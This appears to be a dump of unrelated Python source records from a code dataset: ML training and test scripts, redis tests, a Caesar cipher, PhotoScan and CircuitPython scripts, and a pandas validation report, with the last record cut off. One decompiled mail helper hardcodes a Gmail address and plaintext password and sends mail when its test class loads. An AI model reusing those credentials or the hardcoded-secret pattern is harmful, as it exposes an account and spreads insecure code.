'best_model_Epoch_{}_step_{}_mAP_{:.4f}_loss_{:.4f}_lr_{:.7g}'.format(\n epoch, int(__global_step), best_mAP, 
val_loss_total.average, __lr))\n\n writer.add_summary(make_summary('evaluation/val_mAP', mAP), global_step=epoch)\n writer.add_summary(make_summary('evaluation/val_recall', rec_total.average), global_step=epoch)\n writer.add_summary(make_summary('evaluation/val_precision', prec_total.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/total_loss', val_loss_total.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_xy', val_loss_xy.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_wh', val_loss_wh.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_conf', val_loss_conf.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_class', val_loss_class.average), global_step=epoch)\n\n","sub_path":"mutili_gpu_train/mutili_gpu_train.py","file_name":"mutili_gpu_train.py","file_ext":"py","file_size_in_byte":21310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"642387032","text":"#!/usr/bin/env python\n\nimport argparse\nimport subprocess\nfrom subprocess import Popen, PIPE, STDOUT\n\nimport crfsuite\n\nfrom feature_extractor import FeatureExtractor\nfrom text_processing.corpus_utils import CorpusUtils\n\n\ndef sequence_feed(filename, field_names, separator=' '):\n X = []\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n if line == '': # on empty line yield sequence/sentence\n yield X\n X = []\n else:\n fields = line.split(separator)\n if len(fields) < len(field_names):\n raise ValueError('Expected {} fields: {}'.format(\n len(field_names), field_names))\n item = {'F': []} # item features\n for ii, field_name in enumerate(field_names):\n item[field_name] = fields[ii]\n X.append(item)\n\n\ndef output_features(out, X, f):\n for item in X:\n out.write('%s' % item[f])\n for field in item['F']:\n out.write('\\t%s' % field)\n out.write('\\n')\n out.write('\\n')\n\n\ndef features_string(X, f):\n fstr = ''\n for item in X:\n fstr += '%s' % item[f]\n for field in item['F']:\n fstr += '\\t%s' % field\n fstr += '\\n'\n fstr += '\\n'\n return fstr\n\n\ndef to_crfsuite(X):\n \"\"\"\n Convert an item sequence into an object compatible with crfsuite\n Python module.\n\n @type X: list of mapping objects\n @param X: The sequence.\n @rtype crfsuite.ItemSequence\n @return The same sequence in crfsuite.ItemSequence type.\n \"\"\"\n xseq = crfsuite.ItemSequence()\n for x in X:\n item = crfsuite.Item()\n for f in x['F']:\n item.append(crfsuite.Attribute(f))\n xseq.append(item)\n return xseq\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='CRFsuite utilities')\n subparsers = parser.add_subparsers(dest='command')\n subparsers.required = True\n train_parser = subparsers.add_parser(\n 'train', help='Train a CRF NER model.')\n train_parser.add_argument(\n 'bin',\n help='Path to the CRF-Suite binary. 
(Usually in ~/local/bin/crfsuite)')\n train_parser.add_argument(\n 'input', help='Training data prepared with the \\'features\\' command.')\n train_parser.add_argument('model', help='Name of the output CRF model.')\n tag_parser = subparsers.add_parser('tag', help='tag file')\n tag_parser.add_argument('model')\n tag_parser.add_argument('input')\n tag_parser.add_argument('output')\n\n args = parser.parse_args()\n\n conll_fields = ['token', 'entity']\n\n if args.command == 'train':\n cmd = [args.bin, 'learn', '-m', args.model, args.input]\n subprocess.call(cmd)\n elif args.command == 'tag':\n fextractor = FeatureExtractor()\n print('feature extractor loaded')\n\n tagger = crfsuite.Tagger()\n tagger.open(args.model)\n\n cu = CorpusUtils(sent_split=True)\n with open(args.input, 'r') as _in:\n text = _in.readlines()\n\n tags = {}\n with open(args.output, 'w') as out:\n for X in cu.crf_sequence_feed(text):\n fextractor.sequence_features(X)\n xseq = to_crfsuite(X)\n yseq = tagger.tag(xseq)\n for ii, v in enumerate(X):\n if yseq[ii] != 'O':\n tags[v['token']] = yseq[ii]\n for ii, v in enumerate(X):\n out.write('\\t'.join(v[f] for f in conll_fields))\n out.write('\\t%s\\n' % yseq[ii])\n out.write('\\n')\n print(tags)","sub_path":"src/ner/crf_utils.py","file_name":"crf_utils.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"573085916","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 31 16:13:01 2020\n\n@author: kerui\n\"\"\"\n\nimport argparse\nimport os\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\n\nfrom dataloaders.completion_segmentation_loader_new import load_calib, oheight, owidth, input_options, KittiDepth\nfrom completion_segmentation_model import DepthCompletionNet\nfrom metrics import AverageMeter, Result\nimport criteria\nimport completion_segmentation_helper\nfrom inverse_warp import Intrinsics, homography_from\nfrom torchviz import make_dot\n\n#from torchsummary import summary\n\nparser = argparse.ArgumentParser(description='Sparse-to-Dense')\nparser.add_argument('-w',\n '--workers',\n default=4,\n type=int,\n metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs',\n default=11,\n type=int,\n metavar='N',\n help='number of total epochs to run (default: 11)')\nparser.add_argument('--start-epoch',\n default=0,\n type=int,\n metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('-c',\n '--criterion',\n metavar='LOSS',\n default='l2',\n choices=criteria.loss_names,\n help='loss function: | '.join(criteria.loss_names) +\n ' (default: l2)')\nparser.add_argument('--image_height',\n default=80,\n type=int,\n help='height of image for train (default: 80)')\n\nparser.add_argument('--image_width',\n default=80,\n type=int,\n help='width of image for train (default: 80)')\n\nparser.add_argument('-b',\n '--batch-size',\n default=1,\n type=int,\n help='mini-batch size (default: 1)')\nparser.add_argument('--lr',\n '--learning-rate',\n default=1e-5,\n type=float,\n metavar='LR',\n help='initial learning rate (default 1e-5)')\nparser.add_argument('--weight-decay',\n '--wd',\n default=0,\n type=float,\n metavar='W',\n help='weight decay (default: 0)')\nparser.add_argument('--print-freq',\n '-p',\n default=10,\n type=int,\n metavar='N',\n help='print frequency (default: 10)')\nparser.add_argument('--resume',\n default='',\n type=str,\n 
metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--data-folder',\n default='../data',\n type=str,\n metavar='PATH',\n help='data folder (default: none)')\nparser.add_argument('-i',\n '--input',\n type=str,\n default='gd',\n choices=input_options,\n help='input: | '.join(input_options))\nparser.add_argument('-l',\n '--layers',\n type=int,\n default=34,\n help='use 16 for sparse_conv; use 18 or 34 for resnet')\nparser.add_argument('--pretrained',\n action=\"store_true\",\n help='use ImageNet pre-trained weights')\nparser.add_argument('--val',\n type=str,\n default=\"select\",\n choices=[\"select\", \"full\"],\n help='full or select validation set')\nparser.add_argument('--jitter',\n type=float,\n default=0.1,\n help='color jitter for images')\nparser.add_argument(\n '--rank-metric',\n type=str,\n default='rmse',\n choices=[m for m in dir(Result()) if not m.startswith('_')],\n help='metrics for which best result is sbatch_datacted')\nparser.add_argument(\n '-m',\n '--train-mode',\n type=str,\n default=\"dense\",\n choices=[\"dense\", \"sparse\", \"photo\", \"sparse+photo\", \"dense+photo\"],\n help='dense | sparse | photo | sparse+photo | dense+photo')\nparser.add_argument('-e', '--evaluate', default='', type=str, metavar='PATH')\nparser.add_argument('--cpu', action=\"store_true\", help='run on cpu')\n\nargs = parser.parse_args()\nargs.use_pose = (\"photo\" in args.train_mode)\n# args.pretrained = not args.no_pretrained\nargs.result = os.path.join('..', 'results')\nargs.use_rgb = ('rgb' in args.input) or args.use_pose\nargs.use_d = 'd' in args.input\nargs.use_g = 'g' in args.input\nif args.use_pose:\n args.w1, args.w2 = 0.1, 0.1\nelse:\n args.w1, args.w2 = 0, 0\nprint(args)\n\ncuda = torch.cuda.is_available() and not args.cpu\nif cuda:\n import torch.backends.cudnn as cudnn\n cudnn.benchmark = True\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\nprint(\"=> using '{}' for computation.\".format(device))\n\n# define loss functions\ndepth_criterion = criteria.MaskedMSELoss() if (\n args.criterion == 'l2') else criteria.MaskedL1Loss()\nphotometric_criterion = criteria.PhotometricLoss()\nsmoothness_criterion = criteria.SmoothnessLoss()\nsegmentation_criterion = nn.NLLLoss2d() # 语义分割loss\n\nif args.use_pose:\n # hard-coded KITTI camera intrinsics\n K = load_calib()\n fu, fv = float(K[0, 0]), float(K[1, 1])\n cu, cv = float(K[0, 2]), float(K[1, 2])\n kitti_intrinsics = Intrinsics(owidth, oheight, fu, fv, cu, cv)\n if cuda:\n kitti_intrinsics = kitti_intrinsics.cuda()\n\n\ndef iterate(mode, args, loader, model, optimizer, logger, epoch):\n # switch to appropriate mode\n assert mode in [\"train\", \"val\", \"eval\", \"test_prediction\", \"test_completion_segmentation\", \"test_completion\"], \\\n \"unsupported mode: {}\".format(mode)\n model.eval()\n\n for i, batch_data in enumerate(loader):\n start = time.time()\n batch_data = {\n key: val.to(device)\n for key, val in batch_data.items() if val is not None\n }\n \n data_time = time.time() - start\n\n start = time.time()\n \n # 2020/03/27\n \n with torch.no_grad(): # 自己加的, 设置torch.no_grad(),在val时不计算梯度,可以节省显存\n pred = model(batch_data)\n \n \n # 预测值\n completion_pred, segmentation_pred = pred\n\n gpu_time = time.time() - start\n\n # 打印信息\n logger.test_print(mode, i, len(loader))\n # 保存预测结果为图片\n logger.conditional_save_pred(mode, i, pred, epoch)\n\n\ndef main():\n global args\n checkpoint = None\n is_eval = True # 测试\n if args.evaluate:\n args_new = args\n if 
os.path.isfile(args.evaluate):\n print(\"=> loading checkpoint '{}' ... \".format(args.evaluate),\n end='')\n checkpoint = torch.load(args.evaluate, map_location=device)\n args = checkpoint['args']\n args.data_folder = args_new.data_folder\n args.val = args_new.val\n is_eval = True\n print(\"Completed.\")\n else:\n print(\"No model found at '{}'\".format(args.evaluate))\n return\n\n print(\"=> creating model and optimizer ... \", end='')\n model = DepthCompletionNet(args).to(device)\n \n \n model_named_params = [\n p for _, p in model.named_parameters() if p.requires_grad\n ]\n optimizer = torch.optim.Adam(model_named_params,\n lr=args.lr,\n weight_decay=args.weight_decay)\n print(\"completed.\")\n if checkpoint is not None:\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> checkpoint state loaded.\")\n\n model = torch.nn.DataParallel(model)\n\n # Data loading code\n \n val_dataset = KittiDepth('test_completion_segmentation', args)\n val_loader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=1,\n shuffle=False,\n num_workers=2,\n pin_memory=True) # set batch size to be 1 for validation\n print(\"\\t==> val_loader size:{}\".format(len(val_loader)))\n\n # create backups and results folder\n logger = completion_segmentation_helper.logger(args)\n if checkpoint is not None:\n logger.best_result = checkpoint['best_result']\n print(\"=> logger created.\")\n\n if is_eval:\n print(\"=> starting model evaluation ...\")\n iterate(\"test_completion_segmentation\", args, val_loader, model, None, logger,\n checkpoint['epoch'])\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"v3/completion_segmentation_test.py","file_name":"completion_segmentation_test.py","file_ext":"py","file_size_in_byte":9030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"78137732","text":"import redis\nimport unittest\n\nfrom redis.exceptions import ConnectionError\nfrom redis.compat import next\n\nencode = lambda s: s.encode()\n\nclass PubSubTestCase(unittest.TestCase):\n def setUp(self):\n self.connection_pool = redis.ConnectionPool()\n self.client = redis.Redis(connection_pool=self.connection_pool)\n self.pubsub = self.client.pubsub()\n\n def tearDown(self):\n self.connection_pool.disconnect()\n\n def test_channel_subscribe(self):\n self.assertEquals(\n self.pubsub.subscribe('foo'),\n ['subscribe'.encode(), 'foo'.encode(), 1]\n )\n self.assertEquals(self.client.publish('foo', 'hello foo'), 1)\n self.assertEquals(\n next(self.pubsub.listen()),\n {\n 'type': 'message'.encode(),\n 'pattern': None,\n 'channel': 'foo'.encode(),\n 'data': 'hello foo'.encode()\n }\n )\n self.assertEquals(\n self.pubsub.unsubscribe('foo'),\n ['unsubscribe'.encode(), 'foo'.encode(), 0]\n )\n\n def test_pattern_subscribe(self):\n self.assertEquals(\n self.pubsub.psubscribe('fo*'),\n ['psubscribe'.encode(), 'fo*'.encode(), 1]\n )\n self.assertEquals(self.client.publish('foo', 'hello foo'), 1)\n self.assertEquals(\n next(self.pubsub.listen()),\n {\n 'type': 'pmessage'.encode(),\n 'pattern': 'fo*'.encode(),\n 'channel': 'foo'.encode(),\n 'data': 'hello foo'.encode()\n }\n )\n self.assertEquals(\n self.pubsub.punsubscribe('fo*'),\n ['punsubscribe'.encode(), 'fo*'.encode(), 0]\n )\n\nclass PubSubRedisDownTestCase(unittest.TestCase):\n def setUp(self):\n self.connection_pool = redis.ConnectionPool(port=6390)\n self.client = redis.Redis(connection_pool=self.connection_pool)\n self.pubsub = self.client.pubsub()\n\n def 
tearDown(self):\n self.connection_pool.disconnect()\n\n def test_channel_subscribe(self):\n got_exception = False\n try:\n self.pubsub.subscribe('foo')\n except ConnectionError:\n got_exception = True\n self.assertTrue(got_exception)\n","sub_path":"tests/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"264435103","text":"\nimport math\nchars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' # char alphabet\nmesenger = \"Xin chao cac ban, minh la Trung\".upper() #messenger\nk = 16 # key\nmode = 'encrypt' # mode decrypt\n\n#main program\ndef Cipher():\n translated = ''\n for c in mesenger:\n if c in chars:\n num = chars.find(c)\n if mode == 'encrypt':\n num += k\n elif mode == 'decrypt':\n num -= k\n pos = num % 26;\n translated += chars[pos]\n print(translated)\n\n\nif __name__ == '__main__':\n Cipher()\n\n\n","sub_path":"source/CaesarCipher.py","file_name":"CaesarCipher.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500808062","text":"import PhotoScan\nimport os\n\ndoc = PhotoScan.app.document\n\n\ndef export_obj(export=True):\n for chunk in doc.chunks:\n if export is True:\n ext = \".obj\"\n file = format_file(ext, chunk)\n chunk.exportModel(file)\n\n\ndef get_save():\n path = PhotoScan.app.getSaveFileName(\"Save project as\")\n try:\n doc.save(path)\n\n except RuntimeError:\n PhotoScan.app.messageBox(\"Can't Save Project\")\n\n\ndef check_save():\n if doc.path is not \"\":\n print(\"save exists\")\n else:\n print(\"no save file\")\n get_save()\n\n\ndef align(chunk):\n chunk.matchPhotos(accuracy=PhotoScan.HighAccuracy,\n generic_preselection=True,\n reference_preselection=False,\n keypoint_limit=55000,\n tiepoint_limit=5000\n )\n chunk.alignCameras()\n\n\ndef align_all():\n for chunk in doc.chunks:\n align(chunk)\n doc.save()\n\n\ndef duplicate(chunk):\n name = chunk.label\n new = chunk.copy()\n new.label = \"{}_3D_PDF\".format(name)\n\n\ndef duplicate_all(export=True):\n for chunk in doc.chunks:\n\n # Max\n name = chunk.label\n chunk.label = \"{}_Max\".format(name)\n\n # Rhino\n rhino = chunk.copy()\n rhino.label = \"{}_Rhino\".format(name)\n rhino.decimateModel(1500000)\n rhino.buildUV(mapping=PhotoScan.GenericMapping)\n rhino.buildTexture(blending=PhotoScan.MosaicBlending,\n size=4096)\n if export is True:\n ext = \".obj\"\n file = format_file(ext, rhino)\n rhino.exportModel(file)\n\n # PDF\n pdf = chunk.copy()\n pdf.label = \"{}_3D\".format(name)\n pdf.decimateModel(100000)\n pdf.buildUV(mapping=PhotoScan.GenericMapping)\n pdf.buildTexture(blending=PhotoScan.MosaicBlending,\n size=4096)\n if export is True:\n ext = \".pdf\"\n file = format_file(ext, pdf)\n pdf.exportModel(file)\n doc.save()\n\n\ndef process(chunk):\n chunk.buildDepthMaps(quality=PhotoScan.MediumQuality,\n filter=PhotoScan.AggressiveFiltering)\n chunk.buildDenseCloud()\n chunk.buildModel(surface=PhotoScan.Arbitrary,\n interpolation=PhotoScan.EnabledInterpolation,\n face_count=0)\n chunk.buildUV(mapping=PhotoScan.GenericMapping)\n chunk.buildTexture(blending=PhotoScan.MosaicBlending,\n size=4096)\n doc.save()\n\n\ndef process_all():\n for chunk in doc.chunks:\n process(chunk)\n\n\ndef decimate_pdf(chunk):\n chunk.decimateModel(100000)\n\n\ndef get_folder(chunk):\n pic = chunk.cameras[0].photo.path\n path = os.path.dirname(pic)\n return path\n\n\ndef format_file(ext, chunk):\n path = get_folder(chunk)\n file = 
\"{}/{}{}\".format(path, chunk.label, ext)\n return file\n\n\ndef main():\n check_save()\n export_obj()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Agisoft/Agi_1_4_0/_Archive/export_objs.py","file_name":"export_objs.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"411008773","text":"# qtpynoisyboi_test.py --\r\n#\r\n# MOSI -- out A (PWM)\r\n# MISO -- out B (PWM)\r\n# A0 -- out C (DAC)\r\n# A1 -- in A\r\n# A2 -- in B\r\n# A3 -- in C\r\n\r\nimport time\r\nimport board\r\n#import neopixel\r\nimport pwmio\r\nimport analogio\r\nimport digitalio\r\nfrom adafruit_debouncer import Debouncer\r\n\r\nbutt1pin = digitalio.DigitalInOut(board.TX)\r\nbutt1pin.pull = digitalio.Pull.UP\r\nbutt1 = Debouncer(butt1pin)\r\n\r\n\r\npotAknob = analogio.AnalogIn(board.A1)\r\n\r\noutA = pwmio.PWMOut(board.MOSI, frequency=25000, duty_cycle=0)\r\noutB = pwmio.PWMOut(board.MISO, frequency=25000, duty_cycle=0)\r\n#outA.duty_cycle = 0\r\noutA.duty_cycle = 32768\r\n#outA.duty_cycle = 65535\r\n\r\n# test: check DC\r\n#while True: time.sleep(0.1); pass\r\n\r\n#cvs = [ 100, 75, 50, 25, 0 ]\r\n#cvs = [ 90, 75, 50, 25, 10,0 ]\r\n#cvs = [ 48, 40, 30, 25 ]\r\nrate = 0.1\r\ncvs_list = [\r\n (90, 75, 50, 25, 10, 0),\r\n (100,0),\r\n ( 48, 40, 30, 25 ),\r\n]\r\ncvsa_index = 0\r\ncvsb_index = 0\r\ncvai=0\r\ncvbi=0\r\ncva_last = time.monotonic()\r\ncvb_last = time.monotonic()\r\n\r\ncvsa = cvs_list[cvsa_index]\r\ncvsb = cvs_list[cvsb_index]\r\n\r\nwhile True:\r\n butt1.update()\r\n now = time.monotonic()\r\n if now > cva_last + rate:\r\n cva_last = now\r\n cvai = (cvai + 1) % len(cvsa)\r\n duty_cycle = int( cvsa[cvai] * 65535/100)\r\n outA.duty_cycle = 65535 - duty_cycle\r\n rate = 0.01 + (potAknob.value / 65535 / 2)\r\n if butt1.fell: # pressed\r\n print(\"push!\")\r\n cvsa_index = (cvsa_index + 1 ) % len(cvs_list)\r\n cvsa = cvs_list[cvsa_index]\r\n \r\n\r\n\r\n\r\n# cv = 50\r\n# while True:\r\n# duty_cycle = int(cv * 65535/100)\r\n# out1.duty_cycle = 65535 - duty_cycle\r\n \r\n# cv_index = 0\r\n# while True:\r\n# if but1.value == False: # pressed\r\n# print(\"push!\")\r\n# cv_index = (cv_index + 1 ) % len(cvs_list)\r\n# cvs = cvs_list[ cv_index ]\r\n \r\n# for cv in cvs:\r\n# duty_cycle = int(cv * 65535/100)\r\n# out1.duty_cycle = 65535 - duty_cycle\r\n# out2.duty_cycle = duty_cycle\r\n# print(\"duty:\",duty_cycle, out1.duty_cycle)\r\n# rate = 0.01 + (potAknob.value / 65535 / 2)\r\n# time.sleep(rate)\r\n \r\n\r\n# # test knob to voltage output\r\n# while True:\r\n# pos = potknob.value // 256\r\n# print(\"pos:\",pos)\r\n# out1.duty_cycle = 65535 - potknob.value # inverting amplifier\r\n# time.sleep(0.01)\r\n\r\n\r\n# # test simple triangle wave output\r\n# i=0\r\n# while True:\r\n# if i < 50:\r\n# out1.duty_cycle = int(i * 2 * 65535 / 100) # Up\r\n# else:\r\n# out1.duty_cycle = 65535 - int((i - 50) * 2 * 65535 / 100) # Down\r\n# i = (i + 1) % 100\r\n# time.sleep(0.001)\r\n \r\n# while True:\r\n# for i in range(100):\r\n# if i < 50:\r\n# led.duty_cycle = int(i * 2 * 65535 / 100) # Up\r\n# else:\r\n# out1.duty_cycle = 65535 - int((i - 50) * 2 * 65535 / 100) # Down\r\n# # time.sleep(0.0001)\r\n\r\n \r\n","sub_path":"firmware/circuitpython/tests/qtpynoisyboi_test2.py","file_name":"qtpynoisyboi_test2.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"389119397","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 
(3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/mad/Documents/spike/spike/util/mail.py\n# Compiled at: 2019-01-16 17:28:48\n# Size of source mod 2**32: 2435 bytes\nfrom __future__ import print_function\nimport smtplib, sys\nif sys.version_info[0] < 3:\n import email.MIMEMultipart as MIMEMultipart\n import email.MIMEBase as MIMEBase\n import email.MIMEText as MIMEText\n from email import Encoders\nelse:\n from email import encoders as Encoders\n from email.mime.base import MIMEBase\n from email.mime.text import MIMEText\n from email.mime.multipart import MIMEMultipart\nimport os.path as op\nimport unittest\n\nclass GMAIL(object):\n __doc__ = '\\n Class for sending mails with Gmail with smtp protocol.\\n input:\\n gmail_user : name of the Gmail account\\n gmail_pwd : password of the Gmail account\\n to: destination of the mail\\n subject: subject of the mail\\n text: text to be sent\\n attach: Attached document\\n Usage: \\n gm = GMAIL()\\n gm.send(to = \\'gmalert67@gmail.com\\', subject = \\'test gmail\\', text = \"hello\", attach = None)\\n '\n\n def __init__(self, gmail_user='gmalert67@gmail.com', gmail_pwd='igbmcalert'):\n self.gmail_user = gmail_user\n self.gmail_pwd = gmail_pwd\n\n def send(self, to, subject, text='', attach=None):\n self.to = to\n self.subject = subject\n self.text = text\n self.attach = attach\n msg = MIMEMultipart()\n msg['From'] = self.gmail_user\n msg['To'] = self.to\n msg['Subject'] = self.subject\n if text != '':\n msg.attach(MIMEText(self.text))\n if attach != None:\n part = MIMEBase('application', 'octet-stream')\n part.set_payload(open(self.attach, 'rb').read())\n Encoders.encode_base64(part)\n part.add_header('Content-Disposition', 'attachment; filename = \"%s\"' % op.basename(self.attach))\n msg.attach(part)\n mailServer = smtplib.SMTP('smtp.gmail.com', 587)\n mailServer.ehlo()\n mailServer.starttls()\n mailServer.ehlo()\n mailServer.login(self.gmail_user, self.gmail_pwd)\n mailServer.sendmail(self.gmail_user, self.to, msg.as_string())\n mailServer.close()\n\n\nclass Test(unittest.TestCase):\n gm = GMAIL()\n gm.send(to='gmalert67@gmail.com', subject='test gmail', text='hello', attach=None)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pycfiles/spike_py-0.99.15.tar/mail.cpython-37.py","file_name":"mail.cpython-37.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"395666041","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom plotly.offline import iplot\nimport plotly.graph_objs as go\nfrom plotly.subplots import make_subplots\n\n\n#Define as funções personalizadas necessárias\ndef write_to_html_file(df, title='', filename='out.html'):\n result = '''\n\n\n\n\n\n '''\n result += '

<h2> %s </h2>
\\n' % title\n if type(df) == pd.io.formats.style.Styler:\n result += df.render()\n else:\n result += df.to_html(classes='wide', escape=False)\n result += '''\n\n\n'''\n with open(filename, 'w') as f:\n f.write(result)\n\ndef highlight_max(s): \n is_max = s == s.max()\n return ['color: white; background-color: #3749E9' if v else '' for v in is_max]\n\ndef highlight_min(s):\n is_max = s == s.min()\n return ['color: white; background-color: #112244' if v else '' for v in is_max]\n\ndef destaque(val):\n color = '#F2F200' if val == 'Sim' else ''\n return 'background: {}'.format(color)\n\ndef destaque_coluna(val):\n color = '#F2F200' if val == 0 else ''\n return 'background: {}'.format(color)\n\n\ndef validacao (relatorio, pasta, tabela_fnt):\n print (\"Gerando Relatório de Validação da Tabela STG_FNT_ITT...\")\n\n # In[4]:\n \n\n #dataframe do o arquivo .xlsx\n\n df = pd.read_excel(tabela_fnt)\n\n\n # In[5]:\n\n\n #df\n\n\n # # Valida os tipos das colunas\n\n # In[6]:\n\n\n #df.dtypes\n\n\n # In[7]:\n\n\n #Trata as datas\n df.DAT_INC_DBO = pd.to_datetime(df.DAT_INC_DBO, format='%Y-%m-%d', errors='coerce')\n\n #Verifica as linhas das colunas o tipo desejado\n dict_tipo = {'ID_STG_FNT_ITT': int, 'NUM_CNPJ': int, 'NUM_CMP_CNPJ': int, 'NOM_COM': str,\n 'NOM_RAZ_SCL': str, 'DAT_INC_DBO': datetime.date}\n dict_analise = {}\n for coluna, tipo in dict_tipo.items():\n dict_analise[coluna] = len([linha for linha in df[coluna]\n if (type(linha) == tipo) or (linha == tipo) or (isinstance(linha, tipo))])\n \n #Calcula a porcentagem do preenchimento por coluna\n final = [x * 100 / len (df) for x in dict_analise.values()]\n\n #Cria um dataframe\n tipo_review = pd.DataFrame({'Porcentagem': final},\n index=df.columns)\n tipo_review = tipo_review.rename_axis('Colunas', axis='columns')\n #tipo_review\n\n\n # In[8]:\n\n\n #Plota em formato gráfico e exporta para HTML\n data = [go.Bar(y=final,\n x=df.columns,\n marker=dict(color='#112244')\n )]\n\n fig = go.Figure(data=data)\n fig.update_xaxes(showline=True, linewidth=1, linecolor='#717171')\n fig.update_yaxes(showgrid=True, gridwidth=1, gridcolor='#D9D9DE')\n fig.update_layout(dict(plot_bgcolor = '#FFFFFF', paper_bgcolor = '#FFFFFF'))\n fig.update_layout(yaxis=dict(ticksuffix = '%'))\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_tipo.html\")\n\n\n # # Define as colunas com dados sensíveis\n\n # In[9]:\n\n\n #Cria um dataframe definido as colunas com dados sensíveis\n dado_sensivel = ['Sim', 'Sim', 'Sim', 'Sim', 'Sim', 'Não']\n\n sensibilidade_review = pd.DataFrame({'Dado Sensível': dado_sensivel},\n index=df.columns)\n sensibilidade_review = sensibilidade_review.rename_axis('Colunas', axis='columns')\n\n visualiza = (sensibilidade_review\n .style\n .applymap(destaque))\n write_to_html_file(visualiza, title='', filename=pasta + \"/fnt_tab_sensibilidade.html\")\n visualiza\n\n\n # # Analisando os campos duplicados\n\n # In[10]:\n\n\n #Analisa o número de valores únicos e que não foram duplicados\n unico = [len(np.unique(df.ID_STG_FNT_ITT)) * 100 / len (df)]\n ff = df[['NUM_CNPJ', 'NUM_CNPJ', 'NUM_CMP_CNPJ', 'NOM_COM', 'DAT_INC_DBO']]\n\n for x in ff.columns:\n coluna = df\n coluna = coluna.replace(0,np.nan)\n soma = coluna.groupby(f'{x}').count()\n soma = soma[soma.ID_STG_FNT_ITT == 1]\n soma = soma.ID_STG_FNT_ITT.sum()\n unico.append (soma * 100 / len (coluna[x]))\n\n #Cria um dataframe\n unico_review = pd.DataFrame({'Campos Não Duplicados': unico},\n index=df.columns)\n unico_review = unico_review.rename_axis('Colunas', axis='columns')\n #unico_review\n\n\n # 
In[11]:\n\n\n #Plota em gráfico de barras horizontal\n data = go.Bar(x = unico, \n y = df.columns, \n orientation = 'h', \n marker = {'color' : '#00B7CC'})\n\n layout = go.Layout(title = '', \n yaxis = {'title': ''}, \n xaxis = {'title': ''})\n\n fig = go.Figure(data = data, layout = layout)\n fig.update_yaxes(showline = True, linewidth = 1, linecolor = '#717171')\n fig.update_xaxes(showgrid = True, gridwidth = 1, gridcolor = '#D9D9DE')\n fig.update_layout({'plot_bgcolor': '#FFFFFF', 'paper_bgcolor': '#FFFFFF'})\n fig.update_layout(xaxis=dict(ticksuffix = '%'))\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_unicos.html\")\n\n\n # # Verifica a completude da tabela\n\n # In[12]:\n\n\n #Completa espaços vaszios com zero\n df = df.fillna(0)\n\n #Converte as colunas para os valores corretos\n df.ID_STG_FNT_ITT = df.ID_STG_FNT_ITT.astype(np.int64)\n df.NUM_CNPJ = df.NUM_CNPJ.astype(np.int64)\n df.NUM_CMP_CNPJ = df.NUM_CMP_CNPJ.astype(np.int64)\n df.NOM_COM = df.NOM_COM.astype (str)\n df.NOM_RAZ_SCL = df.NOM_RAZ_SCL.astype (str)\n #df.dtypes\n\n\n # In[13]:\n\n\n #Calcula o número de linhas completas por coluna\n coluna_id = len([x for x in df.ID_STG_FNT_ITT if x != 0]) * 100 / len (df.ID_STG_FNT_ITT)\n coluna_num_cnpj = len([x for x in df.NUM_CNPJ if x != 0]) * 100 / len (df.NUM_CNPJ)\n coluna_num_comp = len([x for x in df.NUM_CMP_CNPJ if x != 0]) * 100 / len (df.NUM_CMP_CNPJ)\n coluna_nome_com = len([x for x in df.NOM_COM if x != 0]) * 100 / len (df.NOM_COM)\n coluna_nome_raz = len([x for x in df.NOM_RAZ_SCL if x != 0]) * 100 / len (df.NOM_RAZ_SCL)\n coluna_data_inc = len([x for x in df.DAT_INC_DBO if x != 0]) * 100 / len (df.DAT_INC_DBO)\n\n campos_validos = [coluna_id, coluna_num_cnpj, coluna_num_comp, coluna_nome_com, coluna_nome_raz, coluna_data_inc]\n\n #Define um conjunto de rótulos para o index\n preenchimento_labels = ['ID_STG_FNT_ITT', 'NUM_CNPJ', \n 'NUM_CMP_CNPJ', 'NOM_COM', \n 'NOM_RAZ_SCL', 'DAT_INC_DBO']\n\n #Cria uma nova tabela com todos os dados obtidos\n tabela_review = pd.DataFrame({'Campos Válidos': campos_validos},\n 